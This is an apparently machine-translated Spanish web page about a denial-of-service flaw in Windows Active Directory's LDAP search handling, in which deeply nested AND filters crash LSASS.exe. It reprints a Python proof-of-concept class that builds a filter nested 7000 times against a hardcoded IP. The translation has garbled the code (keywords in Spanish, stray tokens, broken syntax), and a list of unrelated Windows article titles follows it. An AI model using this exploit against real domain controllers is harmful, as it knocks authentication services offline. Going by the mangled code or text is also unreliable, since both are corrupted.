LDAP 3 funciones de las solicitudes de búsqueda de Windows Active Directory usuario envía una solicitud por falta de límites del búfer adecuadas de cheques, un atacante remoto podría explotar esta falla se bloquee el servicio LSASS.exe, provocar un desbordamiento de búfer.
servicios de directorio a través de Active Directory basadas en el protocolo LDAP y almacenamiento de protocolo y el uso y acceso a los objetos de Active Directory. Active Directory mediante LDAP 3 de la solicitud de petición de búsqueda 'hay una función problema, un atacante si se genera más de 1000 " Y " las solicitudes enviadas al servidor, pueden conducir a provocar un desbordamiento de pila, se bloquea el servicio de LSASS.exe, el sistema Reinicie en 30 segundos.
ataque:
Core Security Technologies Avisos ([email protected]) proporciona los siguientes métodos de ensayo: Read
Aquí es un scripts de prueba Python:
------------------------------------ ActiveDirectoryDOS
clase (LDAP):
def __init __ (self):
self._s = ninguno
self.host = '192.168.0.1'
self.basedn = 'dc = bugweek, dc = CoreLabs, dc = núcleo-SDI, dc = com '
self.port = 389
self.buffer =' '
self.msg_id = 1
Ldap .__ init __ ()
def generateFilter_BinaryOp (self, filtro): ..
filterBuffer = asn1.OCTETSTRING (filtro de [1]) encode () + asn1.OCTETSTRING (filtro [2]) encode ()
filterBuffer = self.encapsulateHeader (filtro de [0], filterBuffer) guía de regreso filterBuffer
def generateFilter_RecursiveBinaryOp (sel f, filtro, numTimes):
simpleBinOp = self.generateFilter_BinaryOp (filtro)
filterBuffer = simpleBinOp
para cnt en el rango (0, numTimes):
filterBuffer = self.encapsulateHeader (self.LDAP_FILTER_AND, filterBuffer + simpleBinOp): perfil del regreso filterBuffer
def searchSub (auto, filterBuffer):
self.bindRequest ()
self.searchRequest (filterBuffer)
def ejecutar (auto, host = '', basedn = '', name = ''):
# la máquina no debe existir
machine_name = ' xaxax '
filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUAL99vY,' nombre 'machine_name)
# ejecutar la consulta anónima
de impresión' ejecutar la consulta '
filterBuffer = self.generateFilter_RecursiveBinaryOp (filterComputerNotInDir, 7000)
self.searchSub (filterBuffer)
(artículos Continuación) designar a un agente registrado función permite la definición precisa de lo
De acuerdo con la introducción anterior, los usuarios ya saben que Windows 2000 tiene potentes funci
El AD DS reiniciable agrega algunos cambios menores al complemento MMC existente. Un controlador de
- Windows 2000 es el sistema operativo de nueva generación de Microsoft. Se desarrolla sobre la base
Acelere la velocidad de Win2000 navegando en línea.
Opciones del sistema de configuración de Windows 2000
Configuración de seguridad del host virtual de Windows 2000
Configurando un servidor basado en Win 2003
Función de distribución de Win2003 para reducir la administración de la red
El uso correcto del método ISAPI_Rewrite en Windows 2003
Mantenimiento de seguridad de Windows 2000
Configuración del mouse de Windows 2000
El sistema Win10 siempre aparece "el enchufe ha sido retirado de la toma" ¿cómo hacerlo?
Solución de falla del parche KB3000850 actualización del sistema Win8
Vista resuelve problemas del sistema
Win8 Enciclopedia 30: Fácil de usar el ordenador de control de voz
Cómo personalizar el papel en la computadora Win8
Los usuarios de Windows XP proporcionan "Modo de Windows XP".
Introduzca el elemento de servicio "travieso" en el sistema para encontrar la causa raíz del error
Cómo descomponer las sugerencias de la aplicación XP Device Manager